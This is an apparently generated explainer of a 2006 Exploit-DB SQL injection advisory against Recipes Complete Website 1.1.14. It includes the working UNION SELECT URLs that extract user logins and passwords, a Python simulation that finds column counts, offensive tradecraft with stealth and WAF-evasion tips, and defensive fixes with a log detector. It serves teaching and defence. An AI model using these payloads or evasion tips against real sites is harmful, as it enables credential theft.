Exploiting Recipes Complete Website 1.1.14 via SQL Injection

What this paper is
This paper, published on 23 November 2006 (originally on milw0rm, now archived on Exploit-DB), details a SQL injection vulnerability in "Recipes Complete Website" version 1.1.14. The vulnerability lets an unauthenticated attacker read the `login` and `password` columns of the `users` table by injecting a `UNION SELECT` through the `recipeid` parameter of `recipe.php` and the `categoryid` parameter of `list.php`.
Simple technical breakdown
The core of the vulnerability lies in how the web application handles the `recipeid` (in `recipe.php`) and `categoryid` (in `list.php`) GET parameters. Instead of validating them (they should only ever be integers) or binding them as query parameters, the scripts concatenate the raw values into SQL query strings.
By injecting SQL syntax into those values, an attacker can:
- Alter the intended query: use `UNION SELECT` to append the rows of an attacker-chosen query to the result of the original query.
- Extract data: select specific columns (`login` and `password`) from the `users` table.
- Bypass original logic: the `/*` at the end opens a SQL comment that is never closed, so whatever the script appends after the parameter is discarded and only the injected `UNION SELECT` contributes rows. This relies on the database accepting an unterminated `/*` as a comment running to the end of the statement, which the MySQL releases of the time did.
Complete code and payload walkthrough
The "code" in this paper is not traditional executable code but rather URLs demonstrating the exploit. The payload is embedded within these URLs.
Exploit URLs (one per line; the second and third differ only in the column they read):
http://[target]/[path]/recipe.php?recipeid=-1%20UNION%20SELECT%20login,password,0,0,0,0%20FROM%20users%20/*
http://[target]/[path]/list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,login,0,0%20FROM%20users%20/*
http://[target]/[path]/list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,password,0,0%20FROM%20users%20/*
Breakdown of URL components and their practical purpose:
- `http://[target]/[path]/`: the base URL of the vulnerable web application.
  - Practical Purpose: identifies the target server and the directory in which the vulnerable scripts reside.
- `recipe.php` / `list.php`: the vulnerable PHP scripts.
  - Practical Purpose: these are the entry points for the attack, because they read the user-supplied parameters and build database queries from them.
- `?recipeid=-1` / `?pagenum=0&categoryid=-1`: the parameters being manipulated. In `recipe.php`, `recipeid` selects a single recipe; `-1` is chosen because no recipe has that ID, so the original query returns no rows and the only rows the page renders are the ones contributed by the `UNION SELECT`. In `list.php`, `categoryid` filters the recipe list by category and `-1` serves the same purpose; `pagenum=0` simply requests the first page of the listing.
  - Practical Purpose: these parameters are the injection points. The attacker supplies a value that, once inserted into the SQL text, turns the application's query into a compound query ending in the attacker's `UNION SELECT`.
- `%20`: the URL-encoded space character.
  - Practical Purpose: spaces separate SQL keywords and identifiers. Encoding them keeps the payload intact in the request line; the web server decodes them before PHP sees `$_GET`. A `+` would also decode to a space in a query string, and `/**/` is a common substitute where spaces are filtered.
- `UNION SELECT`: the core SQL injection technique. It appends the result set of a second `SELECT` to the result set of the application's own `SELECT`.
  - Practical Purpose: lets the attacker run an arbitrary `SELECT` against any table the application's database account can read, with the rows rendered wherever the page normally prints recipe data.
- `login,password,0,0,0,0` / `0,login,0,0` / `0,password,0,0`: the column lists of the injected `SELECT`. In `recipe.php`, `login` and `password` occupy the first two positions and four `0` placeholders pad the row to six columns, so the original query evidently returns exactly six columns (a `UNION` requires an exact match, not "at least"). In `list.php` the original query returns four columns; a single credential column is placed in the second position (presumably the one the listing prints as the recipe name), once for `login` and once for `password`, which is why two URLs are needed.
  - Practical Purpose: these are the data points the attacker wants. A `UNION` is only valid when both sides return the same number of columns, and on databases stricter than MySQL the column types must also be compatible, so `NULL` is the safer placeholder there. The positions of the real columns are chosen so the values land in fields the page actually displays.
- `FROM users`: the table the injected `SELECT` reads.
  - Practical Purpose: identifies the table holding the credentials. The table and column names were presumably taken from the product's source, which the advisory links for download, rather than guessed.
- `/*`: the opening of a SQL block comment that is never closed.
  - Practical Purpose: this is critical. Whatever the script appends after the parameter (for example an `ORDER BY` or `LIMIT` clause) is swallowed by the comment, so the statement stays syntactically valid and only the attacker's `UNION SELECT` contributes rows. The MySQL releases of the time accepted an unterminated `/*` as a comment running to the end of the statement; current MySQL rejects it with a syntax error, so `-- ` (with the trailing space) or `#` are the usual replacements today.
Payload Execution Flow:
- The attacker requests a URL whose `recipeid` or `categoryid` value contains SQL syntax.
- The web server decodes the request and hands the parameters to the PHP script.
- The PHP script concatenates the raw `recipeid` or `categoryid` value into its SQL string.
- Because the value is neither validated nor bound as a parameter, the injected `UNION SELECT` becomes part of the statement the database parses.
- The database executes the compound query: the original `SELECT` matches nothing (no recipe or category has ID -1), and the `UNION SELECT` part reads `login` and/or `password` from the `users` table.
- The trailing `/*` comments out whatever the script appended after the parameter, so the statement stays valid.
- The rows of the `UNION SELECT` are returned to the PHP script.
- The script, expecting recipe data, renders those rows in its page template, so the credentials appear where a recipe title or listing entry would normally be shown.
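The flow above, simulated end to end as an added example (this is not code from the advisory or from Recipes Complete Website, whose real `recipe.php` query is not published): a stand-in SQLite database with a constructed six-column `recipes` table and a `users` table, the vulnerable string-concatenated query, the paper's first PoC URL with an invented host and path, the trial-and-error column-count discovery that produces the `0,0,0,0` padding, and the validated, parameterized query that closes the hole. Column names other than `users.login` and `users.password`, the `SELECT_RECIPE` text and `target.example` are assumptions. SQLite stands in for MySQL because, like the MySQL releases of 2006, it treats an unterminated `/*` as a comment running to the end of the statement.

```python
"""Added example (not code from the advisory or the product): the recipe.php
injection simulated against a stand-in SQLite database.

Assumptions: the recipes table, its six column names, the SELECT that
recipe.php builds and the host/path in PAYLOAD_URL are invented here; only
users.login / users.password and the payload come from the advisory.
"""
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# The advisory's first PoC URL with a constructed host and path.
PAYLOAD_URL = ("http://target.example/recipes/recipe.php?recipeid="
               "-1%20UNION%20SELECT%20login,password,0,0,0,0%20FROM%20users%20/*")

# Assumed shape of the original query: six columns, plus a clause after the
# parameter that the payload's trailing /* has to comment out.
SELECT_RECIPE = ("SELECT recipeid, title, ingredients, method, categoryid, author "
                 "FROM recipes WHERE recipeid = %s ORDER BY recipeid")


def build_db() -> sqlite3.Connection:
    """Constructed sample data: one recipe and two users to leak."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE recipes(recipeid INTEGER, title TEXT, ingredients TEXT,
                             method TEXT, categoryid INTEGER, author TEXT);
        CREATE TABLE users(login TEXT, password TEXT);
        INSERT INTO recipes VALUES
            (1, 'Pancakes', 'flour, eggs, milk', 'mix, then fry', 2, 'alice');
        INSERT INTO users VALUES ('admin', 's3cret'), ('bob', 'hunter2');
    """)
    return db


def recipeid_from_url(url: str) -> str:
    """What PHP's $_GET['recipeid'] would hold: URL-decoded, still a string."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("recipeid", [""])[0]


def vulnerable_recipe_query(db: sqlite3.Connection, recipeid: str) -> list:
    """The flaw: the raw parameter is pasted into the SQL text, so any SQL
    syntax inside it becomes part of the statement."""
    return db.execute(SELECT_RECIPE % recipeid).fetchall()


def leaked_credentials(db: sqlite3.Connection) -> list:
    """Run the PoC payload and return what the page would print as the
    recipe 'title' and 'ingredients' (columns 1 and 2 of every row)."""
    rows = vulnerable_recipe_query(db, recipeid_from_url(PAYLOAD_URL))
    return sorted((row[0], row[1]) for row in rows)


def find_column_count(db: sqlite3.Connection, max_cols: int = 10) -> int:
    """The trial-and-error step behind the 0,0,0,0 padding: widen a UNION
    SELECT of NULLs until the database stops rejecting the column-count
    mismatch. NULL fits any column type, unlike 0 on stricter engines."""
    for n in range(1, max_cols + 1):
        probe = "-1 UNION SELECT " + ",".join(["NULL"] * n) + " /*"
        try:
            vulnerable_recipe_query(db, probe)
        except sqlite3.OperationalError:
            continue  # "SELECTs ... do not have the same number of result columns"
        return n
    raise RuntimeError("no column count up to %d worked" % max_cols)


def hardened_recipe_query(db: sqlite3.Connection, recipeid: str) -> list:
    """The fix: reject anything that is not an integer, then bind the value
    as a parameter so the database never parses it as SQL."""
    if not re.fullmatch(r"\d+", recipeid):
        raise ValueError("recipeid must be a non-negative integer")
    return db.execute(SELECT_RECIPE % "?", (int(recipeid),)).fetchall()


def hardened_blocks_payload(db: sqlite3.Connection) -> bool:
    """True when the hardened version refuses the PoC payload outright."""
    try:
        hardened_recipe_query(db, recipeid_from_url(PAYLOAD_URL))
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    conn = build_db()
    print("columns in original query:", find_column_count(conn))
    print("leaked via UNION SELECT:", leaked_credentials(conn))
    print("hardened query rejects payload:", hardened_blocks_payload(conn))
```

Run it directly to see the two credential rows come back where a recipe would. The hardened version rejects the payload before any SQL is built, and even a value that slipped past the integer check would be bound as data by the `?` placeholder rather than parsed as SQL; the `ORDER BY` in the assumed query is there to show what the trailing `/*` has to swallow.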
Practical details for offensive operations teams
- Required Access Level: None on the target beyond network reachability of the web server. The PoC URLs carry no session cookie or login, so the attack is unauthenticated.
- Lab Preconditions:
- A local or remote lab environment mimicking the vulnerable "Recipes Complete Website" 1.1.14.
- A web server (e.g., Apache, Nginx) configured to serve PHP.
- A database server (e.g., MySQL) accessible by the web server.
- The `users` table populated with sample data (`login`, `password`).
- Understanding of the target web application's structure to identify the correct `[path]` and the vulnerable scripts.
- Tooling Assumptions:
- Web browser for manual testing and observation.
- A proxy tool (e.g., Burp Suite, OWASP ZAP) is highly recommended for intercepting, modifying, and replaying requests, and for automating the process of discovering the correct number of columns.
- SQL injection specific tools (e.g., sqlmap) could automate discovery and exploitation, but understanding the manual process is key.
- Execution Pitfalls:
- Column Mismatch: The most common failure point. The number of columns in the `UNION SELECT` must match the number of columns in the original query exactly. If it does not, the database rejects the statement (MySQL reports "The used SELECT statements have a different number of columns") and the page shows an error or nothing. The count is found by trial and error, widening a `UNION SELECT NULL,NULL,...` probe or an `ORDER BY n` probe until it succeeds, or by letting a tool do it. The paper's counts (six for `recipe.php`, four for `list.php`) apply to version 1.1.14; a modified template or another version may differ.
- URL Encoding: Incorrect URL encoding of special characters can lead to the payload not being interpreted correctly by the server or database.
- Database Type: The paper does not name the database, but the product is a PHP application and MySQL is the likely back end. `UNION SELECT` works across MySQL, PostgreSQL, SQL Server and Oracle, but comment syntax differs (`-- ` with a trailing space, `#`, or `/* */`), placeholder typing is stricter outside MySQL (use `NULL` rather than `0`), and an unterminated `/*` is not accepted everywhere.
- Web Application Firewall (WAF): Modern WAFs are likely to detect and block `UNION SELECT` statements. The paper is from 2006, so WAF evasion techniques would be necessary for contemporary targets.
- Application Logic: The vulnerability relies on the application displaying the results of the SQL query. If the application handles errors or displays data in a way that obscures the injected results, extraction might be difficult.
- Tradecraft Considerations:
- Reconnaissance: Identify the target application version. Understand the URL structure and parameters used by the application.
- Enumeration: Use a proxy to observe normal application behavior and identify parameters that are likely passed to a database.
- Discovery: Systematically test parameters for SQL injection vulnerabilities, starting with common techniques like `UNION SELECT`. Use tools to help determine the number of columns.
- Extraction: Once a vulnerability is confirmed, extract data incrementally. Avoid overly aggressive queries that might trigger alerts or cause performance issues.
- Stealth: Use URL encoding, alternative comment styles, and potentially WAF evasion techniques if operating against a protected environment.
- Documentation: Record all successful exploitation steps, extracted data, and any observed system behavior.
Where this was used and when
- Context: This exploit targets a specific PHP web application called "Recipes Complete Website" version 1.1.14. Such applications were common for managing recipe collections online.
- Timeframe: The paper was published on November 23, 2006. This indicates the vulnerability was active and known around that period. Exploits from this era were often used in the wild by various actors, including script kiddies and more sophisticated attackers, to gain unauthorized access to web application data.
Defensive lessons for modern teams
- Input Validation and Sanitization: This is the most fundamental defense. All user-supplied input, especially data that will be incorporated into database queries, must be rigorously validated and sanitized. This includes:
- Type checking: Ensure numeric inputs are indeed numbers.
- Whitelisting: Only allow known-good characters or patterns.
- Escaping: Where a value genuinely cannot be bound as a parameter, escape it with the database driver's own escaping function. Hand-rolled escaping is error-prone and is a fallback, not a substitute for parameterized queries.
- Parameterized Queries (Prepared Statements): This is the gold standard. Instead of concatenating user input into SQL strings, use parameterized queries where the SQL query structure is defined separately from the data. The database engine then treats the input purely as data, not executable code.
- Least Privilege: Database accounts used by web applications should have only the minimum necessary permissions. For example, the account that reads recipes should not hold `DROP TABLE` or `DELETE` privileges, and the public-facing scripts should not need read access to the `users` table at all. Independently, that table should hold only salted password hashes, so a leak does not hand out working credentials.
- Web Application Firewalls (WAFs): While not a silver bullet, WAFs can provide a valuable layer of defense by detecting and blocking common attack patterns like `UNION SELECT`. However, they require regular updates and can be bypassed (double URL encoding, inline comments between keywords).
- Regular Patching and Updates: Keep all web applications, frameworks, and server software up-to-date to patch known vulnerabilities. This specific exploit targets an old version, highlighting the importance of patching.
- Error Handling: Configure applications to log detailed errors internally but display generic, non-informative error messages to users. This prevents attackers from gaining information through error messages.
- Database Auditing: Monitor database activity for suspicious queries, such as unexpected `SELECT` statements on sensitive tables or unusual query patterns.
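A detection-side counterpart to the WAF and auditing points, added here and not part of the advisory: scan web-server access logs for the pattern these PoC URLs leave behind. The log lines are constructed for this example in Apache/Nginx combined format with invented hosts and paths; the three payloads are the paper's, one of them double-URL-encoded (`%2520`) to show why a WAF rule or log monitor has to decode repeatedly before matching.

```python
"""Added detection example (not from the advisory): flag this exploit's
UNION-based payloads in web-server access logs.

The log lines are constructed for the example (Apache/Nginx combined
format, invented addresses and paths); the payloads are the advisory's
three PoC URLs, the last one double-URL-encoded.
"""
import re
from urllib.parse import parse_qsl, unquote_plus

SAMPLE_LOG = """\
10.0.0.5 - - [23/Nov/2006:10:01:02 +0000] "GET /recipes/recipe.php?recipeid=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [23/Nov/2006:10:01:40 +0000] "GET /recipes/recipe.php?recipeid=-1%20UNION%20SELECT%20login,password,0,0,0,0%20FROM%20users%20/* HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.0.0.9 - - [23/Nov/2006:10:02:15 +0000] "GET /recipes/list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,login,0,0%20FROM%20users%20/* HTTP/1.1" 200 3190 "-" "Mozilla/5.0"
10.0.0.9 - - [23/Nov/2006:10:02:31 +0000] "GET /recipes/list.php?pagenum=0&categoryid=-1%2520UNION%2520SELECT%25200,password,0,0%2520FROM%2520users%2520/* HTTP/1.1" 200 3190 "-" "Mozilla/5.0"
10.0.0.7 - - [23/Nov/2006:10:03:00 +0000] "GET /recipes/list.php?pagenum=1&categoryid=3 HTTP/1.1" 200 7700 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method and request target of a combined-format line.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# UNION [ALL] SELECT with whitespace or inline comments between the keywords
# (UNION/**/SELECT is a common filter-evasion variant).
UNION_RE = re.compile(
    r'\bunion\b(?:\s|/\*.*?\*/)+(?:all(?:\s|/\*.*?\*/)+)?select\b', re.I)
# A trailing comment opener that discards the rest of the original query.
TERMINATOR_RE = re.compile(r'(?:/\*|--|#)\s*$')


def normalize(value: str) -> str:
    """URL-decode until nothing changes, so %2520 (double encoding) unfolds
    to a space as well, then collapse whitespace for matching."""
    previous = None
    while value != previous:
        previous, value = value, unquote_plus(value)
    return re.sub(r'\s+', ' ', value).strip()


def is_union_injection(value: str) -> bool:
    """True if the decoded parameter value contains a UNION ... SELECT."""
    return UNION_RE.search(normalize(value)) is not None


def scan_log(text: str) -> list:
    """Return one finding per request parameter that carries a UNION SELECT."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m['target'].partition('?')
        for param, raw in parse_qsl(query, keep_blank_values=True):
            if not is_union_injection(raw):
                continue
            payload = normalize(raw)
            findings.append({
                'ip': m['ip'],
                'time': m['ts'],
                'script': path.rsplit('/', 1)[-1],
                'param': param,
                'payload': payload,
                'reads_users_table': re.search(r'\bfrom\s+users\b', payload, re.I) is not None,
                'comment_terminated': TERMINATOR_RE.search(payload) is not None,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['script']} param={f['param']}: {f['payload']}")
```

Matching on the decoded parameter value rather than the raw request line is what catches the double-encoded and `UNION/**/SELECT` variants; a plain `UNION%20SELECT` string match misses both. In production the same check belongs in the WAF rule or the SIEM parser, and a hit that also reads `FROM users` deserves an alert rather than a log entry.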
ASCII visual (if applicable)
This exploit is primarily about manipulating HTTP requests and SQL queries. A direct ASCII visual of the exploit itself isn't highly applicable. However, we can visualize the flow of data and the injection point.
+-----------------+ +-----------------+ +-----------------+ +-----------------+
| Attacker's | ---> | Web Server | ---> | Vulnerable PHP | ---> | Database Server |
| Browser/Tool | | (Receives Req) | | Script | | (Executes SQL) |
+-----------------+ +-----------------+ +-----------------+ +-----------------+
| | |
| HTTP Request with | Constructs SQL | Returns Data
| injected SQL | Query | (Credentials)
| (e.g., ?recipeid=-1 UNION SELECT...) | |
| | |
+--------------------------------------------------+----------------------+
|
v
+-----------------+
| Attacker sees |
| Credentials |
+-----------------+
Explanation:
- The attacker sends a crafted HTTP request.
- The web server passes this request to the vulnerable PHP script.
- The PHP script, due to lack of sanitization, directly embeds the malicious SQL into a query it sends to the database.
- The database executes the query, including the attacker's `UNION SELECT`.
- The database returns the requested data (login/password) back through the PHP script.
- The attacker observes the extracted credentials, often displayed on the web page.
Source references
- Paper ID: 2834
- Paper Title: Recipes Complete Website 1.1.14 - SQL Injection
- Author: GregStar
- Published: 2006-11-23
- Keywords: PHP, webapps
- Paper URL: https://www.exploit-db.com/papers/2834
- Raw URL: https://www.exploit-db.com/raw/2834
Original Exploit-DB Content (Verbatim)
*************************************************************************************************************************#
#
Coding 4 Fun #
#
*************************************************************************************************************************#
#
* Recipes Complete Website 1.1.14 (http://www.easysitenetwork.com/modules.php?name=Content&pa=showpage&pid=2) ; #
#
* Class = SQL Injection ; #
#
* Download = http://www.easysitenetwork.com/modules.php?name=Downloads&d_op=getit&lid=3 ; #
#
* Found by = GregStar (gregstar[at]c4f[dot]pl) (http://c4f.pl) ; #
#
-------------------------------------------------------------------------------------------------------------------------#
#
#
- PoC: #
#
http://[target]/[path]/recipe.php?recipeid=-1%20UNION%20SELECT%20login,password,0,0,0,0%20FROM%20users%20/* #
#
-------------------------------------------------------------------------------------------------------------------------#
http://[target]/[path]/list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,login,0,0%20FROM%20users%20/* - login #
#
-------------------------------------------------------------------------------------------------------------------------#
http://[target]/[path]/list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,password,0,0%20FROM%20users%20/* - password #
#
*************************************************************************************************************************#
Gr33tz: sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,rfl,d3m0n,java,reyw,kw@ch. #
#
*************************************************************************************************************************#
# milw0rm.com [2006-11-23]